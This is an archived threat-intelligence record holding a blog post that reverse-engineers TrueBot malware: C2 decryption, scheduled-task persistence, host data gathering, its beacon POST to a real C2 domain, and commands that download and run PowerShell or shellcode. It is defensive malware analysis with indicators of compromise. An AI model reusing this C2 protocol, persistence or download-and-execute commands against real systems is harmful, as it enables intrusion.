{
	"id": "03d9f03e-2373-4037-b7bb-e616f284fead",
	"created_at": "2026-04-06T00:12:31.535071Z",
	"updated_at": "2026-04-10T13:12:57.292446Z",
	"deleted_at": null,
	"sha1_hash": "f5ac5b24528d0aa81d5457fc7fe07c49de144ee1",
	"title": "TrueBot Analysis Part III - Capabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10770934,
	"plain_text": "TrueBot Analysis Part III - Capabilities\r\nBy Robert Giczewski\r\nPublished: 2023-03-31 · Archived: 2026-04-05 20:56:19 UTC\r\nAfter we have dealt with TrueBot’s packer in Part I and Part II, we can now finally analyze its core and see if we find something useful to extract in the next part.\r\nEvery unpacked sample I’ve seen so far looks pretty much identical. In this case, we’ll analyze c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c.\r\nAt the beginning there is a lot of stuff going on that I haven’t analyzed and probably never will because it seems like it’s just garbage. The interesting part starts further down (marked red in the figure below):\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 1 of 11\n\nFortunately, TrueBot’s code is pretty well readable. There are no encrypted strings except the C2. API calls are properly imported and referenced and there is no anti-analysis/debug functionality.\r\nGet the C2\r\nRight at the start of the interesting code block, we can see three strings which look suspicious. Two of them are obviously Base64 encoded strings and are passed as arguments to the b64_decode() function; the other is passed as an argument to a function that turns out to be an RC4 decryption function.\r\nBefore decrypting the Base64 decoded string, the string is passed to a URL decode function for whatever reason.\r\nWhen decoding the Base64 strings we get the following results:\r\necho \"OSVlZSVmMCU4ZU9ZJTk3RC0lYjYlMGQlYWYlMDVYLg==\" | base64 -D\r\n9%ee%f0%8eOY%97D-%b6%0d%af%05X.\r\necho \"ZyVmZSVmNCU5YlklMDMlOTVNOQ==\" | base64 -D\r\ng%fe%f4%9bY%03%95M9\r\nAfter putting the Base64 decoded string into the url_decode function, we get the decoded bytes for the encrypted C2.\r\n9%ee%f0%8eOY%97D-%b6%0d%af%05X. =\u003e 39 EE F0 8E 4F 59 97 44 2D B6 0D AF 05 58 2E\r\ng%fe%f4%9bY%03%95M9 =\u003e 67 fe f4 9b 59 03 95 4d 39\r\nIn the next steps, TrueBot is RC4 decrypting both of the earlier decoded bytes.\r\n39 EE F0 8E 4F 59 97 44 2D B6 0D AF 05 58 2E =\u003e qweastradoc.com\r\n67 fe f4 9b 59 03 95 4d 39 =\u003e /gate.php\r\nPersistence\r\nBefore persisting itself, TrueBot creates a Mutex (IFjwi312fu321321rfewfew) to check if another instance of itself is running; if so, it will terminate via ExitProcess(0).\r\nRight after creating the mutex, TrueBot tries to persist itself by creating a scheduled task via a COM interface. TrueBot supports both the Task Scheduler 1.0 and 2.0 API and therefore uses the respective different CLSIDs.\r\nTask Scheduler 1.0 API - Pre-Vista: 148BD52A-A2AB-11CE-B11F-00AA00530503\r\nTask Scheduler 2.0 API - Vista and higher: 0F87369F-A4E5-4CFC-BD3E-73E6154572DD\r\nThe scheduled task is set up to run after each login and is configured to execute TrueBot via rundll32.exe.\r\nC2 Communication\r\nRight after persisting itself, TrueBot gathers information from the infected system which will be sent to the C2. To get rid of “unwanted” processes, TrueBot filters those against a hardcoded list of keywords.\r\nAll other collected process names are then concatenated with | as a delimiter and stored into a buffer.\r\nAfter collecting the processes, TrueBot searches for the existence of files with the file extension .JSONIP. If there is no such file, it will be created with a random 13-character alphabetical name, for example C:\\ProgramData\\QdJLLvdcYfqmK.JSONIP. TrueBot will then create a new GUID with the following formula:\r\nwsprintfA(buffer, \"%08x-%08x\", pguid.Data3 + pguid.Data1 * pguid.Data2, pguid.Data1 * pguid.Data2\r\nand write it into the newly created file. The GUID and the previously collected processes are combined into a string, which is then URL encoded. The result before the URL encoding looks like this:\r\nThe URL encoded data is then encoded with Base64 and sent to the C2 on port 80 with a self-crafted HTTP request:\r\nAfter sending the initial data to the C2, TrueBot performs some kind of connectivity check by trying to connect to google.com. If it fails, it will try again after one second until it is successful.\r\nWhen successful, TrueBot tries to get the victim’s DNS domain and the hostname by calling GetComputerNameExA() twice.\r\nIn the last step before sending data to the C2, TrueBot tries to identify the operating system version via GetVersionExA() and, depending on the VersionInformation, it just returns a number which is then used as an index into a hardcoded OS version array:\r\nFinally, TrueBot constructs the data string which will be sent to the C2:\r\nLike the collected processes earlier, the string will be URL and Base64 encoded and sent to the C2 with the following POST request:\r\nPOST /gate.php HTTP/1.0\\r\\n\r\nHost: qweastradoc.com\\r\\n\r\nContent-type: application/x-www-form-urlencoded\\r\\n\r\nContent-length: 116\\r\\n\r\n\\r\\n\r\nbiUzZGQ2MDQzYmYyLWQ2MDNhMjlhJTI2byUzZFdJTjEwJTI2YSUzZDY0JTI2dSUzZFdPUktHUk9VUCUyNnAlM2RERVNLVE9QLT\r\nAfter sending the POST request, TrueBot is expecting one of the following commands from the C2:\r\nKLLS\r\nPS1\r\nSHC\r\nS64\r\nThe commands PS1, SHC and S64 will only be executed if there is a “http” string in front of them, for example:\r\nhttp|PS1\r\nI’m not sure if this is intended by the author and what the real response from the C2 looks like, but at least during debugging this seems to work, see the following image:\r\nKLLS: Terminates itself via cmd.exe, for example C:\\WINDOWS\\system32\\cmd.exe /c del C:\\Users\\user\\\r\nPS1: Download and execute a PowerShell script via wmic.exe, e.g. wmic.exe process call create \"pow\r\nSHC: Download and execute shellcode\r\nS64: Download and execute shellcode with higher privileges (if possible)\r\nFor the commands PS1, SHC and S64, the received payload from the C2 will first be decrypted with RC4 again, but this time with another RC4 key, in this case OfgjkwsikhU23.\r\nIn the next blogpost, we’ll do some more coding again and write a config extractor that extracts the most important artifacts from the binary. Stay tuned.\r\nIOCs:\r\nc042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c\r\nqweastradoc[.]com\r\nSource: https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html"
	],
	"report_names": [
		"analyzing-truebot-capabilities.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434351,
	"ts_updated_at": 1775826777,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.pdf",
		"text": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.txt",
		"img": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.jpg"
	}
}